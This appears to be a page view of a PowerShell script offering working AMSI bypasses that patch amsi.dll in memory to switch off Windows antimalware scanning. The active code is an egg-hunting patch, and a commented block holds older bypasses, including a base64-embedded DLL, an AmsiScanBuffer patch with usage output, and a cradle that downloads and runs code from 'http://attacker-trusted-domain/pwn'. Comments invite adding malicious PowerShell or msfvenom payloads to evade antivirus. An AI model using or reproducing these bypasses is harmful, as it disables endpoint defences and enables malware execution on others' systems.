191 lines
15 KiB
PowerShell
191 lines
15 KiB
PowerShell
|
######################################################################################################################################
|
||
|
|
# Latest (and useful!) AMSI bypass using egghunting method (from June 2019)
|
||
|
|
# Last test: 19th May 2020
|
||
|
|
#
|
||
|
|
#
|
||
|
|
# Example on how to use-it for real-life payload delivery : https://github.com/kmkz/exploit/blob/master/Full-payload-delivery-chain.ps1
|
||
|
|
######################################################################################################################################
|
||
|
|
Write-Host "-- AMSI Patch"
|
||
|
|
Write-Host "-- Paul Laîné (@am0nsec)"
|
||
|
|
Write-Host ""
|
||
|
|
|
||
|
|
$Kernel32 = @"
|
||
|
|
using System;
|
||
|
|
using System.Runtime.InteropServices;
|
||
|
|
|
||
|
|
public class Kernel32 {
|
||
|
|
[DllImport("kernel32")]
|
||
|
|
public static extern IntPtr GetProcAddress(IntPtr hModule, string lpProcName);
|
||
|
|
|
||
|
|
[DllImport("kernel32")]
|
||
|
|
public static extern IntPtr LoadLibrary(string lpLibFileName);
|
||
|
|
|
||
|
|
[DllImport("kernel32")]
|
||
|
|
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
|
||
|
|
}
|
||
|
|
"@
|
||
|
|
|
||
|
|
Add-Type $Kernel32
|
||
|
|
|
||
|
|
Class Hunter {
|
||
|
|
static [IntPtr] FindAddress([IntPtr]$address, [byte[]]$egg) {
|
||
|
|
while ($true) {
|
||
|
|
[int]$count = 0
|
||
|
|
|
||
|
|
while ($true) {
|
||
|
|
[IntPtr]$address = [IntPtr]::Add($address, 1)
|
||
|
|
If ([System.Runtime.InteropServices.Marshal]::ReadByte($address) -eq $egg.Get($count)) {
|
||
|
|
$count++
|
||
|
|
If ($count -eq $egg.Length) {
|
||
|
|
return [IntPtr]::Subtract($address, $egg.Length - 1)
|
||
|
|
}
|
||
|
|
} Else { break }
|
||
|
|
}
|
||
|
|
}
|
||
|
|
|
||
|
|
return $address
|
||
|
|
}
|
||
|
|
}
|
||
|
|
|
||
|
|
[IntPtr]$hModule = [Kernel32]::LoadLibrary("amsi.dll")
|
||
|
|
Write-Host "[+] AMSI DLL Handle: $hModule"
|
||
|
|
|
||
|
|
[IntPtr]$dllCanUnloadNowAddress = [Kernel32]::GetProcAddress($hModule, "DllCanUnloadNow")
|
||
|
|
Write-Host "[+] DllCanUnloadNow address: $dllCanUnloadNowAddress"
|
||
|
|
|
||
|
|
If ([IntPtr]::Size -eq 8) {
|
||
|
|
Write-Host "[+] 64-bits process"
|
||
|
|
[byte[]]$egg = [byte[]] (
|
||
|
|
0x4C, 0x8B, 0xDC, # mov r11,rsp
|
||
|
|
0x49, 0x89, 0x5B, 0x08, # mov qword ptr [r11+8],rbx
|
||
|
|
0x49, 0x89, 0x6B, 0x10, # mov qword ptr [r11+10h],rbp
|
||
|
|
0x49, 0x89, 0x73, 0x18, # mov qword ptr [r11+18h],rsi
|
||
|
|
0x57, # push rdi
|
||
|
|
0x41, 0x56, # push r14
|
||
|
|
0x41, 0x57, # push r15
|
||
|
|
0x48, 0x83, 0xEC, 0x70 # sub rsp,70h
|
||
|
|
)
|
||
|
|
} Else {
|
||
|
|
Write-Host "[+] 32-bits process"
|
||
|
|
[byte[]]$egg = [byte[]] (
|
||
|
|
0x8B, 0xFF, # mov edi,edi
|
||
|
|
0x55, # push ebp
|
||
|
|
0x8B, 0xEC, # mov ebp,esp
|
||
|
|
0x83, 0xEC, 0x18, # sub esp,18h
|
||
|
|
0x53, # push ebx
|
||
|
|
0x56 # push esi
|
||
|
|
)
|
||
|
|
}
|
||
|
|
[IntPtr]$targetedAddress = [Hunter]::FindAddress($dllCanUnloadNowAddress, $egg)
|
||
|
|
Write-Host "[+] Targeted address: $targetedAddress"
|
||
|
|
|
||
|
|
$oldProtectionBuffer = 0
|
||
|
|
[Kernel32]::VirtualProtect($targetedAddress, [uint32]2, 4, [ref]$oldProtectionBuffer) | Out-Null
|
||
|
|
|
||
|
|
$patch = [byte[]] (
|
||
|
|
0x31, 0xC0, # xor rax, rax
|
||
|
|
0xC3 # ret
|
||
|
|
)
|
||
|
|
[System.Runtime.InteropServices.Marshal]::Copy($patch, 0, $targetedAddress, 3)
|
||
|
|
|
||
|
|
$a = 0
|
||
|
|
[Kernel32]::VirtualProtect($targetedAddress, [uint32]2, $oldProtectionBuffer, [ref]$a) | Out-Null
|
||
|
|
|
||
|
|
<#
|
||
|
|
|
||
|
|
AMSI bypass historic
|
||
|
|
|
||
|
|
|
||
|
|
|
||
|
|
----------------------------------------------------------------------------------------------------------------------
|
||
|
|
$mem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(9076);
|
||
|
|
[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiSession","NonPublic,Static").SetValue($null, $null);
|
||
|
|
[Ref].Assembly.GetType("System.Management.Automation.AmsiUtils").GetField("amsiContext","NonPublic,Static").SetValue($null, [IntPtr]$mem);
|
||
|
|
[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};
|
||
|
|
$e=new-object net.webclient;
|
||
|
|
$e.proxy=[Net.WebRequest]::GetSystemWebProxy();
|
||
|
|
$e.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;
|
||
|
|
IEX $e.downloadstring('http://attacker-trusted-domain/pwn');
|
||
|
|
|
||
|
|
######################################################################################################################################
|
||
|
|
# Tested on Win10 (31/10/2018)
|
||
|
|
#
|
||
|
|
# Source: https://0x00-0x00.github.io/research/2018/10/28/How-to-bypass-AMSI-and-Execute-ANY-malicious-powershell-code.html
|
||
|
|
######################################################################################################################################
|
||
|
|
|
||
|
|
function Bypass-AMSI
|
||
|
|
{
|
||
|
|
if(-not ([System.Management.Automation.PSTypeName]"Bypass.AMSI").Type) {
|
||
|
|
[Reflection.Assembly]::Load([Convert]::FromBase64String("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N0RBQ0VEAEJ5cGFzc0FNU0kAbXNjb3JsaWIAc3JjAERpc2FibGUAUnVudGltZUZpZWxkSGFuZGxlAENvbnNvbGUAaE1vZHVsZQBwcm9jTmFtZQBuYW1lAFdyaXRlTGluZQBWYWx1ZVR5cGUAQ29tcGlsZXJHZW5lcmF0ZWRBdHRyaWJ1dGUAR3VpZEF0dHJpYnV0ZQBEZWJ1Z2dhYmxlQXR0cmlidXRlAENvbVZpc2libGVBdHRyaWJ1dGUAQXNzZW1ibHlUaXRsZUF0dHJpYnV0ZQBBc3NlbWJseVRyYWRlbWFya0F0dHJpYnV0ZQBUYXJnZXRGcmFtZXdvcmtBdHRyaWJ1dGUAQXNzZW1ibHlGaWxlVmVyc2lvbkF0dHJpYnV0ZQBBc3NlbWJseUNvbmZpZ3VyYXRpb25BdHRyaWJ1dGUAQXNzZW1ibHlEZXNjcmlwdGlvbkF0dHJpYnV0ZQBDb21waWxhdGlvblJlbGF4YXRpb25zQXR0cmlidXRlAEFzc2VtYmx5UHJvZHVjdEF0dHJpYnV0ZQBBc3NlbWJseUNvcHlyaWdodEF0dHJpYnV0ZQBBc3NlbWJseUNvbXBhbnlBdHRyaWJ1dGUAUnVudGltZUNvbXBhdGliaWxpdHlBdHRyaWJ1dGUAQnl0ZQBkd1NpemUAc2l6ZQBTeXN0ZW0uUnVudGltZS5WZXJzaW9uaW5nAEFsbG9jSEdsb2JhbABNYXJzaGFsAEtlcm5lbDMyLmRsbABCeXBhc3NBTVNJLmRsbABTeXN0ZW0AU3lzdGVtLlJlZmxlY3Rpb24Ab3BfQWRkaXRpb24AWmVybwAuY3RvcgBVSW50UHRyAFN5c3RlbS5EaWFnbm9zdGljcwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJTZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBSdW50aW1lSGVscGVycwBCeXBhc3MAR2V0UHJvY0FkZHJlc3MAbHBBZGRyZXNzAE9iamVjdABscGZsT2xkUHJvdGVjdABWaXJ0dWFsUHJvdGVjdABmbE5ld1Byb3RlY3QAb3BfRXhwbGljaXQAZGVzdABJbml0aWFsaXplQXJyYXkAQ29weQBMb2FkTGlicmFyeQBSdGxNb3ZlTWVtb3J5AG9wX0VxdWFsaXR5AAAAABFhAG0AcwBpAC4AZABsAGwAAFdFAFIAUgBPAFIAOgAgAEMAbwB1AGwAZAAgAG4AbwB0ACAAcgBlAHQAcgBpAGUAdgBlACAAYQBtAHMAaQAuAGQAbABsACAAcABvAGkAbgB0AGUAcgAuAAAdQQBtAHMAaQBTAGMAYQBuAEIAdQBmAGYAZQByAABzRQBSAFIATwBSADoAIABDAG8AdQBsAGQAIABuAG8AdAAgAHIAZQB0AHIAaQBlAHYAZQAgAEEAbQBzAGkAUwBjAGEAbgBCAHUAZgBmAGUAcgAgAGYAdQBuAGMAdABpAG8AbgAgAHAAbwBpAG4AdABlAHIAAHVFAFIAUgBPAFIAOgAgAEMAbwB1AGwAZAAgAG4AbwB0ACAAYwBoAGEAbgBnAGUAIABBAG0AcwBpAF
|
||
|
|
Write-Output "DLL has been reflected";
|
||
|
|
}
|
||
|
|
[Bypass.AMSI]::Disable()
|
||
|
|
|
||
|
|
#
|
||
|
|
# You can put malicious powershell here to execute-it when Bypass-AMSI function is triggered
|
||
|
|
# -> in case of msfvenom usage : use psh-net as format
|
||
|
|
# -> customize the PowerShell code in order to bypass A.V detection (or use other tools such like unicorn)
|
||
|
|
}
|
||
|
|
|
||
|
|
######################################################################################################################################
|
||
|
|
[**] update 08/01/2019 from rasta-mouse's AmsiScanBufferBypass project (https://rastamouse.me/2018/12/amsiscanbuffer-bypass-part-4/):
|
||
|
|
######################################################################################################################################
|
||
|
|
$Ref = (
|
||
|
|
"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
|
||
|
|
"System.Runtime.InteropServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a"
|
||
|
|
)
|
||
|
|
|
||
|
|
$Source = @"
|
||
|
|
using System;
|
||
|
|
using System.Runtime.InteropServices;
|
||
|
|
|
||
|
|
namespace Bypass
|
||
|
|
{
|
||
|
|
public class AMSI
|
||
|
|
{
|
||
|
|
[DllImport("kernel32")]
|
||
|
|
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
|
||
|
|
[DllImport("kernel32")]
|
||
|
|
public static extern IntPtr LoadLibrary(string name);
|
||
|
|
[DllImport("kernel32")]
|
||
|
|
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);
|
||
|
|
|
||
|
|
[DllImport("Kernel32.dll", EntryPoint = "RtlMoveMemory", SetLastError = false)]
|
||
|
|
static extern void MoveMemory(IntPtr dest, IntPtr src, int size);
|
||
|
|
|
||
|
|
public static int Disable()
|
||
|
|
{
|
||
|
|
IntPtr TargetDLL = LoadLibrary("amsi.dll");
|
||
|
|
if (TargetDLL == IntPtr.Zero) { return 1; }
|
||
|
|
|
||
|
|
IntPtr ASBPtr = GetProcAddress(TargetDLL, "Amsi" + "Scan" + "Buffer");
|
||
|
|
if (ASBPtr == IntPtr.Zero) { return 1; }
|
||
|
|
|
||
|
|
UIntPtr dwSize = (UIntPtr)5;
|
||
|
|
uint Zero = 0;
|
||
|
|
|
||
|
|
if (!VirtualProtect(ASBPtr, dwSize, 0x40, out Zero)) { return 1; }
|
||
|
|
|
||
|
|
Byte[] Patch = { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
|
||
|
|
IntPtr unmanagedPointer = Marshal.AllocHGlobal(6);
|
||
|
|
Marshal.Copy(Patch, 0, unmanagedPointer, 6);
|
||
|
|
MoveMemory(ASBPtr, unmanagedPointer, 6);
|
||
|
|
|
||
|
|
return 0;
|
||
|
|
}
|
||
|
|
}
|
||
|
|
}
|
||
|
|
"@
|
||
|
|
|
||
|
|
Add-Type -ReferencedAssemblies $Ref -TypeDefinition $Source -Language CSharp
|
||
|
|
|
||
|
|
[+] Usage:
|
||
|
|
PS C:\Users\jmbourbon\Desktop\R&D> . .\amsi-bypass.ps1
|
||
|
|
PS C:\Users\jmbourbon\Desktop\R&D> [Bypass.AMSI]::Disable()
|
||
|
|
0
|
||
|
|
|
||
|
|
PS C:\Users\jmbourbon\Desktop\R&D> "AmsiScanBuffer"
|
||
|
|
AmsiScanBuffer
|
||
|
|
|
||
|
|
#>
|